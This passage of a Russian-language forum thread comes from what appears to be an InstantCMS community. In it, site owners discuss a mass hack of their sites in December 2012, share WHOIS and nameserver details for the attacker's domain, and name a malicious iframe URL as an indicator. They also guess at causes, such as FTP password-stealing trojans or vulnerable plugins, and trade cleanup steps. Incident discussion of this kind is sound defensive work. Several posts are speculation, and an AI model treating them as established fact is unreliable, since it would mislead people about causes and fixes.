 nserver:       ns2.newrect.com.
 nserver:       ns3.newrect.com.
 nserver:       ns4.newrect.com.
 nserver:       ns5.newrect.com.
 nserver:       ns6.newrect.com.
 state:         REGISTERED, DELEGATED, UNVERIFIED
 person:        Private Person
 registrar:     REGGI-REG-RIPN
 admin-contact: https://panel.reggi.ru/user/whois/webmail/
 created:       2012.12.07
 paid-till:     2013.12.07
 free-date:     2014.01.07
 source:        TCI
 
 Last updated on 2013.01.01 04:26:31 MSK

picaboo 12 лет назад #

домен на дропа регнут, домен на одном айпишнике висит, айпишник индийский - концы в воду :)
ns1.newrect.com. [115.144.16.10] [TTL=172800]
ns2.newrect.com. [60.250.95.1] [TTL=172800]
ns3.newrect.com. [109.162.123.232] [TTL=172800]
ns4.newrect.com. [175.181.119.52] [TTL=172800]
ns5.newrect.com. [219.85.175.131] [TTL=172800]
ns6.newrect.com. [50.140.73.80] [TTL=172800]

но! при этом поскольку партнерки ставятся вполне конкретные и с идентификатором, при желании поймать гада можно. нужно лишь дождаться выплаты с партнерки и начать отслеживать цепочку по которой он будет деньги выводить. но это уже дело тех кому этим совершенно не интересно заниматься :(

Димитриус 12 лет назад #

это писать заявление надо....

picaboo 12 лет назад #

А у нас вообще редкостно развит пофигизм. Вон народу сколько воет в топике, а хоть один логи изучил? или хотя бы пароли сменил?

поорали на форуме, бекап откатили и сидят дальше.

Azura 12 лет назад #

У меня подобное было, я писала в яндекс. Мне индексацию вернула и всё норм...

deltas 12 лет назад #

Мы не воем, мы делом занимаемся smile

Предупредили остальных, чтобы не расслаблялись, восстановили свои сайты, пообщались с хостером на котором вредонос располагается, он пообещал принять меры вплоть до установления личности и передачи в правоохранительные органы. Сказали что сделают все возможное. Ждем :)

picaboo 12 лет назад #

ну если бы конкретно вы, как основной программист одного из сайтов по инстанту и автор кучи дополнений, делом бы не занимались - я бы стал вас опасаться smile

вас сам бог велел разобраться и восстановить всю последовательность проишествия.

я про остальных, уровень высказываемых претензий которых, дает право сделать выводы о том что я выше написал.

Владимир Савенко ✝️ 12 лет назад #

есть определенные органы, которые занимаются киберпреступностью. Помню меня отдел "К" при ФСБ проверял за якобы распространение порнухи с моего хостинга. Разобрались. Если есть потерпевшие (тьфу, тьфу, тьфу я не в их числе) пишите коллективное письмо жалобу, дайте наводку на этого "перца" если захотят найдут. Лично я забанил несколько доменов с фишинг-сайтами, письмо хостеру с указанием нарушением законов РФ помогает на раз.

hydraq 12 лет назад #

Сайт на 1.9 - не использую ФТС клиенты
Полет нормальный
Стоит модуль снежинок

fotpod 12 лет назад #

Была недавно хрень подобного рода, но хорошо, что только в индексном файле шаблона залез. Выявил просто, пробежался по всем своим сайтам (в т.ч. и не на ицмс) каспер ругнулся, значит не дыра, а всеми нами любимый ФайлЗилла. Решение одно, вручную изгнал нечисть, сменил пароли на ФТП, почту, админку и т.п. (только лишь из-за того, что они иногда были одинаковыми). Снес полностью файлзиллу, установил с нуля и настроил в нем "менеджер сайтов" с типом входа "запросить пароль", поставил Каспера лицензионного, проверил весь хард, до кучи решил что работать с админскими правами в компе больше не буду, добавил нового пользователя с ограниченными, пока все чисто хотя версия 1.9))

-5

Керя 12 лет назад #

Господа а сам сайт инстантна т.е. этот не взломан у меня сейчас по переходу по пагинации на 7ю страницу хром ругается о вредоносном по!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

Керя 12 лет назад #

не прочитал сразу всю ветку, там по ходу с http://templateinstant.ru

ukrtop 12 лет назад #

- Действительно та-же чепуха.

На эту веб-страницу было вставлено содержание с templateinstant.ru, известного распространителя вредоносного ПО. Ее посещение может привести к заражению вашего компьютера вредоносным ПО.

По сути получается , что может пострадать не весь сайт целиком? Это вероятно перепроверять все страницы сайта по отдельности. Да и принцип не понятен даже в данном случае здесь! Я имею в виду то что файл index.php не при делах.шесть страниц открывает без проблем а седьмая с сюрпризом. Получается что вредоносный код находится в базе данных? Т.к. контент берется от туда.

Коля 12 лет назад #

Картинка вставлена, берется она с templateinstant естественно в гугле уже прописалось что на templateinstant вирус, браузер от гугля естественно кричит так как картинка с templateinstant вот и все.

-1

ukrtop 12 лет назад #

К стати я заметил что часто фигурирует сайт БилàРиуса http://templateinstant.ru , а его участия в теме отсутствует. Может он и не знает, раз мер на своем сайте не принимает и тут его нет? А если знает, то хотелось-бы узнать почему Хром свистит в его сторону...

Владимир Савенко ✝️ 12 лет назад #

ну Вы бы хоть почитали бы всю ветку
БилàРиус # 31 декабря 2012 в 16:44
Закрыл сайт до выяснения обстоятельств
[Ответить]

-1

ukrtop 12 лет назад #

Начнем с того, я ни в коем случае не хочу беспочвенно кого-то обвинять, а тем более БилРиус, зная его активное участи на этом сайте. А сообщение я вероятно и пропустил. Хотя в любом случае интересно почему чаще всего ХРОМ ссылается на его сайт. Может это целеноправленно кто-то пытается в вести смуту...

Man 12 лет назад #

Не буду начинать новую тему, так как ситуация подобная.

Сегодня вернулся из отпуска и обнаружил, что 8 сайтов, находящиеся на одном хостинге, не работают.
По статистике посмотрел, что 29 декабря трафик перестал поступать на сайты.
Обратился к хостеру и получил вот такой ответ:

Ваш аккаунт был поврежден в результате взлома (а также были закачаны всякие вредоносные скрипты). Произошло это по сл.возможным причинам:
1. Ваш компьютер (либо какой-либо другой, с которого вы подключались к хостинг-аккаунту по FTP, панели управления или личному кабинету) заражен вирусами.
2. Дырки в скриптах (в движке/CMS или даже каком-либо их плагине)
Проверяйте и п.1 и п.2. Пароль на ваш хостинг-аккаунт сменен (новый пароль придет вам в автоматическом уведомлении на эл.почту). Новый пароль используйте только после проверки п.1

FTP клиентами не пользуюсь.
Закачал только что DR. WEB CUREIT и обнаружил троян.

Версия движка 1.9. Переходить на 1.10 пока не стал, т.к. стоит куча хаков и не хочется потерять проделанную работу.

Это первый взлом моих сайтов и действительно странно, что в один и тот же день полетело такое количество сайтов на Инстанте.

-3

dontstop 12 лет назад #

посоны, это я ломанул. расходимся :D
на самом деле странно очень это все..даже если это увод паролей от фтп, то почему массово пострадали сайты на яцмс?...

-1

letsgo 12 лет назад #

Дело не в паролях все таки стоит. Скорее всего есть какой то общий скрипт, скорее всего из выложенных в блоге, через который это дело и провернули. Не могут вот так украсть столько паролей у совершенно разных людей. Можно конечно кивать на фаилзиллу, но я бы предпочел все таки знать причину. Кто нибудь из зараженных изучил логи? Сначала я думал что через 101виджет, но учитывая что у некоторых его не было, значит другой скрипт с дыркой возможно.

dontstop 12 лет назад #

думаю ломанули лентяев которые правами на директории пренебрегают

Kreator 12 лет назад #

возможно где-то есть инструкция по правам на папки, но до сих пор я видел небольшие записи то тут то там ...
возможно когда-то кто-то знающий толк в правах выложит инструкцию в блоге

-3

dontstop 12 лет назад #

Возможно это будут админы :D

deltas 12 лет назад #

а вот права на директории и файлы как раз были те что и полагается, думаете вы неправильно...

r2 12 лет назад #

letsgo, дело в паролях. Введите в гугле адрес зловредного фрейма:

Код PHP:

 
http://nypmivhy.ru/count5.php (не переходить!)

и вы увидите тысячи зараженных им сайтов по всему миру.
Причина давно известна - виндовый троян.

deltas 12 лет назад #

да, и к сожалению прописался не только nypmivhy.ru а и еще несколько доменов с похожим файлом count6.php
видимо они размножаются :(

letsgo 12 лет назад #

Спасибо за ответ. Виндовый троян вполне понятная причина.

nedoriko 12 лет назад #

а у меня вопрос к тем, кого ломанули:
- чьи партнерки рекламные у вас на сайте есть?
если есть.

Man 12 лет назад #

Адсенс, Директ и Aviasales.

wils 12 лет назад #

у меня норм нечего левого 1.10

RSN 12 лет назад #

Возможно два варианта, либо партнерка дырявая, либо какое то дополнение использует что то дырявое.
Насчет FTP, может конечно, но хоть бы кто выложил тогда название вируса который он обнаружил на своем компе. Раз пароли от ФТП уводят, их же должно что то уводить... А так получается сами что ли ушли...

У меня 6 лет назад сайт через ФТП был заражен, так там четко два антивирусника и каспер и НОД (причем тогда еще не лицензионные) показали трояна, причем того который по базам антивирусников и занимается именно воровством данных.

deltas 12 лет назад #

Хочу так же объяснить, сайт http://templateinstant.ru/ и демо-поддомены не содержат вирусов. Сайты чисты, но после взлома занесены в блек-лист Яндекса и Гугля. После перепроверки этими сервисами они будут разблокированы. К сожалению на это требуется пару дней. Сайт можно проверить например этим сервисом - http://sitecheck.sucuri.net

Эдька 12 лет назад #

добрый вечер. у меня сайт не ругается каспером и хромом. но я проверил sitecheck.sucuri.net этим сайтом и вот что выдало

Май 12 лет назад #

Это говорит только о том, что sitecheck.sucuri.net считает loginza.ru подозрительным сайтом, не более того smile

Harconen 12 лет назад #

да проблема луче на вордпресе седел бы перешол на этот инстант стока купил и куча проблемы и бан вдобавок сайта

picaboo 12 лет назад #

а на вордпрессе пароли от фтп не угоняют? пожалуй надо перейти на него.

IRATE 12 лет назад #

На FileZilla сделали запоминание пароля только на 1 сессию. Может и раньше было, но я не замечал.

Май 12 лет назад #

Почему Вы так уверены, что это проблема именно cms а не собственного безалаберного отношения к вопросам безопасности? Если бы Вы следили за обсуждениями по этой теме, то увидели бы, что непосредственно сама cms тут ни при чём.

IRATE 12 лет назад #

В Яндекс.мастер можно проверять сайт на вшивость.

Harconen 12 лет назад #

и каму верить ?

Harconen 12 лет назад #

иле вот каму вереть ?

IRATE 12 лет назад #

Что мешает удалить этот файл, пройтись ай- болитом и сделать то, что он напишет? Это как минимум.

IRATE 12 лет назад #

Лично я слил бы весь сайт на локальную машину и проверил бы хотя бы Microsoft security essential.

Harconen 12 лет назад #

так проверено всем и все нормально мкафе чтота ругаетса непонятно !

IRATE 12 лет назад #

То есть вы скачали весь сайт на локальную машину и проверили антивирусом? Чистили КЭш на хостинге ( не просто чистить КЭш в панели управления) и нашли этот файл и удалили?

Harconen 12 лет назад #

как можно найти скрипт уже всем проверил

max molotov 11 лет назад #

у ... меня есть пару сайтов на джумле... и они тоже заразились бякой... видимо зараза пришла по фтп... до этого хостер разсылал сообщение о участившихся зараженьях... но инстантушка не зразился